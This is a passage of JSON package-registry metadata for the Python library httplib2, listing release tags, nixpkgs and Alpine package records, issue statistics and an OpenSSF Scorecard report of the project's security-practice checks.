.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T20:13:50.957Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python313Packages.httplib2?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python313Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python313Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python313Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5672,"html_url":null,"role":null,"created_at":"2026-03-07T01:24:07.453Z","updated_at":"2026-03-07T01:24:07.453Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":153806,"maintainers_count":4905,"namespaces_count":0,"keywords_count":3244,"github":"NixOS","metadata":{"funded_packages_count":6032},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-08-25T05:00:24.061Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":11765539,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-08-06T14:05:28.214Z","created_at":"2025-06-07T18:22:41.489Z","updated_at":"2026-08-21T20:28:54.756Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fh